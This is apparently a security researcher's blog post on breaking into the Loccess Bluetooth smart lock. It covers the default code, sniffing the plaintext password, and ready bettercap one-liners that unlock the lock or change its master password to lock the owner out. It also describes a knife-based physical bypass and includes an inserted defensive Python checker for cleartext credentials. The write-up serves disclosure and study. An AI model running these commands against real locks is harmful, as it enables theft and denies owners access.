The Loccess smart lock is marketed as a lock for luggage, bicycles and lockers. Besides the keypad on the bottom of the device, it can also be opened from your smartphone over BLE.
I was able to get this smart lock at Amazon for around $20.
I installed the Android app and after reading the installation manual it seems that the factory code for opening the lock is 000000.
So, starting with the defaults, I opened the Loccess using nothing but bettercap (the short manual doesn't tell the user to change the password, and the mobile app doesn't force it either):
It JustWorks! By pure luck the first writable characteristic (handle 0x000e) gives us the open sesame operation.
One thing I need to mention is that the Loccess has a wake-up button: you need to press it before it advertises. But if you think about it, a malicious user who wants to steal something has to be close to the device anyway, so pressing a button is not an obstacle.
What happens if a user changes the default password? I changed it to a strong password (not): 123456.
Before sniffing, I tried the factory password again, just to see whether it was a key to rule them all, but it didn't work.
Ubertooth caught something interesting. When the victim opens the lock, the following request is caught in plaintext:
Look at the new password. If we update our request and send it with bettercap, it will open the Loccess. You can use a one-liner for that (the characteristic UUID is the unlock characteristic from the app, 6E400002-...):
sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400002b5a3f393e0a9e50e24dcca9e 313233343536;sleep 2;q"
You can even sniff the authentication from the admin:
Handle 0x0014 deals with the login username/password:
After getting this access, you can change the 4-digit button pincode and the master password, and reset the lock to factory values.
Forcing the requests without the login/password will not work.
If the attacker gains the login/password combo and changes the master password and the button pincode, I don't see how the victim could open the lock again (without breaking it).
Taking the last pcap from Wireshark, let's PoC with bettercap and change the master password to 666666:
sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400004b5a3f393e0a9e50e24dcca9e xxxxxxxx33000000000531323334353600000006;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400005b5a3f393e0a9e50e24dcca9e 363636363636;sleep 2;q"
From an attacker's point of view:
- Press the wake-up button
- Send a BLE request with the factory password
- If that doesn't work, sniff the traffic between the victim's phone and the Loccess
- Use the new password (or change the existing one) and open the lock
Regarding the mobile app from Loccess, it's quite simple and doesn't have a lot of unnecessary code.
First the permissions from the mobile app:
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.BLUETOOTH_PRIVILEGED" />
<uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.VIBRATE" />
In com.loccess.utils.Constants you have all the characteristic UUIDs you need:
public static String LOCK_CHARACTERISTIC_BATTERY = "6E400008-B5A3-F393-E0A9-E50E24DCCA9E";
public static String LOCK_CHARACTERISTIC_KEYBOARD_PWD = "6E400009-B5A3-F393-E0A9-E50E24DCCA9E";
public static String LOCK_CHARACTERISTIC_LOGIN = "6E400004-B5A3-F393-E0A9-E50E24DCCA9E";
public static String LOCK_CHARACTERISTIC_MODIFY_PASSWORD = "6E400005-B5A3-F393-E0A9-E50E24DCCA9E";
public static String LOCK_CHARACTERISTIC_REGISTER = "6E400003-B5A3-F393-E0A9-E50E24DCCA9E";
public static String LOCK_CHARACTERISTIC_UNLOCK = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E";
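As an added illustration (not code from this post, from Loccess or from the app), here is a small Python checker a defender can run over GATT writes in the form bettercap prints them: it maps the characteristic UUID to the names from the decompiled Constants class above, hex-decodes the payload and flags values that carry an ASCII PIN or password in the clear, or the factory code 000000. The sample capture is constructed from the writes shown in this post; the handling of "xx" bytes assumes redaction only ever appears at the start of a value, as it does here.

```python
import re

# Characteristic UUIDs as listed in the decompiled com.loccess.utils.Constants
# (copied from the post); the names are the app's own constant suffixes.
CHARACTERISTICS = {
    "6E400002-B5A3-F393-E0A9-E50E24DCCA9E": "UNLOCK",
    "6E400003-B5A3-F393-E0A9-E50E24DCCA9E": "REGISTER",
    "6E400004-B5A3-F393-E0A9-E50E24DCCA9E": "LOGIN",
    "6E400005-B5A3-F393-E0A9-E50E24DCCA9E": "MODIFY_PASSWORD",
    "6E400008-B5A3-F393-E0A9-E50E24DCCA9E": "BATTERY",
    "6E400009-B5A3-F393-E0A9-E50E24DCCA9E": "KEYBOARD_PWD",
}
# Characteristics whose payload is expected to carry a secret.
CREDENTIAL_CHARACTERISTICS = {"UNLOCK", "REGISTER", "LOGIN", "MODIFY_PASSWORD", "KEYBOARD_PWD"}
FACTORY_CODE = "000000"  # factory unlock code from the manual, per the post


def normalize_uuid(raw):
    """Accept bettercap's dash-less lowercase form or Android's dashed form and
    return the dashed upper-case form used by the app constants."""
    h = raw.replace("-", "").upper()
    if not re.fullmatch(r"[0-9A-F]{32}", h):
        raise ValueError(f"not a 128-bit UUID: {raw!r}")
    return f"{h[:8]}-{h[8:12]}-{h[12:16]}-{h[16:20]}-{h[20:]}"


def split_redaction(hex_value):
    """Published captures often have leading bytes replaced by 'xx'.
    Return (number of redacted bytes, decodable bytes). Assumption: redaction
    only appears at the start of the value, as in the post's login write."""
    m = re.fullmatch(r"((?:xx)*)([0-9a-f]*)", hex_value.lower())
    if m is None or len(m.group(2)) % 2:
        raise ValueError(f"malformed hex value: {hex_value!r}")
    return len(m.group(1)) // 2, bytes.fromhex(m.group(2))


def find_digit_runs(data, min_len=4):
    """Runs of ASCII decimal digits of at least min_len bytes: the shape a
    numeric PIN or password takes when it is sent as plain ASCII."""
    pattern = rb"[0-9]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii")) for m in re.finditer(pattern, data)]


def analyze_write(uuid, hex_value):
    """Classify one GATT write (characteristic UUID + hex payload) from a sniff."""
    name = CHARACTERISTICS.get(normalize_uuid(uuid), "UNKNOWN")
    redacted, data = split_redaction(hex_value)
    runs = find_digit_runs(data)
    findings = []
    if name in CREDENTIAL_CHARACTERISTICS and runs:
        findings.append("credential sent in the clear over BLE")
    if any(run == FACTORY_CODE for _, run in runs):
        findings.append("factory default code in use")
    return {"characteristic": name, "redacted_bytes": redacted,
            "digit_runs": runs, "findings": findings}


def audit(captures):
    """Run analyze_write over (uuid, hex) pairs; return only writes with findings."""
    results = [analyze_write(u, v) for u, v in captures]
    return [r for r in results if r["findings"]]


# Constructed sample: the writes shown in the post's bettercap one-liners,
# with the same 'xx' redaction the post uses on the login packet, plus one
# made-up battery write that carries no secret.
SAMPLE_CAPTURE = [
    ("6e400002b5a3f393e0a9e50e24dcca9e", "313233343536"),
    ("6e400004b5a3f393e0a9e50e24dcca9e", "xxxxxxxx33000000000531323334353600000006"),
    ("6e400005b5a3f393e0a9e50e24dcca9e", "363636363636"),
    ("6e400008b5a3f393e0a9e50e24dcca9e", "64"),
]

if __name__ == "__main__":
    for r in audit(SAMPLE_CAPTURE):
        print(r["characteristic"], r["digit_runs"], "; ".join(r["findings"]))
```

Run as-is it reports the unlock, login and modify-password writes, each carrying the six-digit password as ASCII; the offset of the digit run inside the login payload shows that the credential is embedded unencrypted in a longer structured record rather than transformed in any way.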
No requests are made to the outside, and the data, including the lock password, is stored locally in an SQLite database:
private static final String DB_NAME = "lockdevice.db";
(...)
private static final String TABLE_CREATE = "create table tbl_lockdevice ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, address TEXT UNIQUE, password TEXT, battery INTEGER DEFAULT 0, warning INTEGER DEFAULT 1, ring INTEGER DEFAULT 0, read_lock_status INTEGER DEFAULT 0, auto_unlock INTEGER DEFAULT 0 )";
Like the other lock I already tested on my personal blog, where I opened a fingerprint lock by directly powering the rotor, I wanted to try something similar here.
The lock itself doesn't seem very robust and appears to have a small spring, which I was able to see in the FCC ID internal photos.
If I can move that spring, I will be able to open the lock. So I grabbed my Kudu knife and... check out the following video:
In conclusion, I had a lot of fun playing with this smart lock, and it's right around the budget limit to be on eyeohtee.cheap :)
Sponsored by: Char49